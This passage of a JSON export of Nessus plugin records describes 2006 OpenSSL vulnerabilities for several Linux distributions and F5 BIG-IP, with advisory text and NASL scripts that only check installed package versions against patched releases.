\"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"compat-openssl097g-0.9.7g-13.5\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"compat-openssl097g\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:14:19", "description": "Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk).\nWhen the test suite was run against OpenSSL two denial of service vulnerabilities were discovered.\n\nDuring the parsing of certain invalid ASN1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory. (CVE-2006-2937)\n\nCertain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack. (CVE-2006-2940)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer. (CVE-2006-3738)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code. Where a client application uses OpenSSL to make a SSLv2 connection to a malicious server that server could cause the client to crash. (CVE-2006-4343)\n\nUpdated packages are patched to address these issues.\n\nUpdate :\n\nThere was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-18T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : openssl (MDKSA-2006:172-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64openssl0.9.7", "p-cpe:/a:mandriva:linux:lib64openssl0.9.7-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.7-static-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.7", "p-cpe:/a:mandriva:linux:libopenssl0.9.7-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.7-static-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:openssl", "cpe:/o:mandriva:linux:2006", "cpe:/o:mandriva:linux:2007"], "id": "MANDRAKE_MDKSA-2006-172.NASL", "href": "https://www.tenable.com/plugins/nessus/24558", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:172. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24558);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\");\n script_xref(name:\"MDKSA\", value:\"2006:172-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : openssl (MDKSA-2006:172-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dr S N Henson of the OpenSSL core team and Open Network Security\nrecently developed an ASN1 test suite for NISCC (www.niscc.gov.uk).\nWhen the test suite was run against OpenSSL two denial of service\nvulnerabilities were discovered.\n\nDuring the parsing of certain invalid ASN1 structures an error\ncondition is mishandled. This can result in an infinite loop which\nconsumes system memory. (CVE-2006-2937)\n\nCertain types of public key can take disproportionate amounts of time\nto process. This could be used by an attacker in a denial of service\nattack. (CVE-2006-2940)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers utility function, used\nby some applications such as exim and mysql. An attacker could send a\nlist of ciphers that would overrun a buffer. (CVE-2006-3738)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\npossible DoS in the sslv2 client code. Where a client application uses\nOpenSSL to make a SSLv2 connection to a malicious server that server\ncould cause the client to crash. (CVE-2006-4343)\n\nUpdated packages are patched to address these issues.\n\nUpdate :\n\nThere was an error in the original published patches for\nCVE-2006-2940. New packages have corrected this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.7-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libopenssl0.9.7-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"openssl-0.9.7g-2.5.20060mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"openssl-0.9.8b-2.2mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:12:48", "description": "Dr. Henson of the OpenSSL core team and Open Network Security discovered a mishandled error condition in the ASN.1 parser. By sending specially crafted packet data, a remote attacker could exploit this to trigger an infinite loop, which would render the service unusable and consume all available system memory. (CVE-2006-2937)\n\nCertain types of public key could take disproportionate amounts of time to process. The library now limits the maximum key exponent size to avoid Denial of Service attacks. (CVE-2006-2940)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers() function. By sending specially crafted packets to applications that use this function (like Exim, MySQL, or the openssl command line tool), a remote attacker could exploit this to execute arbitrary code with the server's privileges. (CVE-2006-3738)\n\nTavis Ormandy and Will Drewry of the Google Security Team reported that the get_server_hello() function did not sufficiently check the client's session certificate. This could be exploited to crash clients by remote attackers sending specially crafted SSL responses.\n(CVE-2006-4343).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : openssl vulnerabilities (USN-353-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libssl-dev", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.7", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg", "p-cpe:/a:canonical:ubuntu_linux:openssl", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-353-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-353-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27933);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\");\n script_xref(name:\"USN\", value:\"353-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : openssl vulnerabilities (USN-353-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dr. Henson of the OpenSSL core team and Open Network Security\ndiscovered a mishandled error condition in the ASN.1 parser. By\nsending specially crafted packet data, a remote attacker could exploit\nthis to trigger an infinite loop, which would render the service\nunusable and consume all available system memory. (CVE-2006-2937)\n\nCertain types of public key could take disproportionate amounts of\ntime to process. The library now limits the maximum key exponent size\nto avoid Denial of Service attacks. (CVE-2006-2940)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers() function. By sending\nspecially crafted packets to applications that use this function (like\nExim, MySQL, or the openssl command line tool), a remote attacker\ncould exploit this to execute arbitrary code with the server's\nprivileges. (CVE-2006-3738)\n\nTavis Ormandy and Will Drewry of the Google Security Team reported\nthat the get_server_hello() function did not sufficiently check the\nclient's session certificate. This could be exploited to crash clients\nby remote attackers sending specially crafted SSL responses.\n(CVE-2006-4343).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/353-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libssl-dev\", pkgver:\"0.9.7e-3ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libssl0.9.7\", pkgver:\"0.9.7e-3ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"openssl\", pkgver:\"0.9.7e-3ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libssl-dev\", pkgver:\"0.9.7g-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libssl0.9.7\", pkgver:\"0.9.7g-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"openssl\", pkgver:\"0.9.7g-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl-dev\", pkgver:\"0.9.8a-7ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8a-7ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8a-7ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssl\", pkgver:\"0.9.8a-7ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl-dev / libssl0.9.7 / libssl0.9.8 / libssl0.9.8-dbg / openssl\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:13:30", "description": "An off-by-one error has been identified in the SSL_get_shared_ciphers() routine in the libssl library from OpenSSL, an implementation of Secure Socket Layer cryptographic libraries and utilities. This error could allow an attacker to crash an application making use of OpenSSL's libssl library, or potentially execute arbitrary code in the security context of the user running such an application.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-03T00:00:00", "type": "nessus", "title": "Debian DSA-1379-1 : openssl - off-by-one error/buffer overflow", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssl", "cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1379.NASL", "href": "https://www.tenable.com/plugins/nessus/26209", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1379. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26209);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\");\n script_xref(name:\"DSA\", value:\"1379\");\n\n script_name(english:\"Debian DSA-1379-1 : openssl - off-by-one error/buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An off-by-one error has been identified in the\nSSL_get_shared_ciphers() routine in the libssl library from OpenSSL,\nan implementation of Secure Socket Layer cryptographic libraries and\nutilities. This error could allow an attacker to crash an application\nmaking use of OpenSSL's libssl library, or potentially execute\narbitrary code in the security context of the user running such an\napplication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=444435\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1379\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssl packages.\n\nFor the old stable distribution (sarge), this problem has been fixed\nin version 0.9.7e-3sarge5.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.9.8c-4etch1.\n\nFor the unstable and testing distributions (sid and lenny,\nrespectively), this problem has been fixed in version 0.9.8e-9.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libssl-dev\", reference:\"0.9.7e-3sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libssl0.9.7\", reference:\"0.9.7e-3sarge5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"openssl\", reference:\"0.9.7e-3sarge5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libssl-dev\", reference:\"0.9.8c-4etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libssl0.9.8\", reference:\"0.9.8c-4etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libssl0.9.8-dbg\", reference:\"0.9.8c-4etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"openssl\", reference:\"0.9.8c-4etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:31", "description": "F5 Product Development has determined that the BIG-IP and Enterprise Manager products use a vulnerable version of OpenSSL; however, the vulnerable code is not used in either TMM or in Apache on the BIG-IP system. The vulnerability is considered to be a local vulnerability and cannot be exploited remotely.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : OpenSSL SSL_get_shared_ciphers vulnerability (SOL8106)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL8106.NASL", "href": "https://www.tenable.com/plugins/nessus/86017", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL8106.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86017);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2007-5135\");\n script_bugtraq_id(25831);\n\n script_name(english:\"F5 Networks BIG-IP : OpenSSL SSL_get_shared_ciphers vulnerability (SOL8106)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"F5 Product Development has determined that the BIG-IP and Enterprise\nManager products use a vulnerable version of OpenSSL; however, the\nvulnerable code is not used in either TMM or in Apache on the BIG-IP\nsystem. The vulnerability is considered to be a local vulnerability\nand cannot be exploited remotely.\"\n );\n # http://www.openssl.org/news/secadv/20071012.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20071012.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K8106\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL8106.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 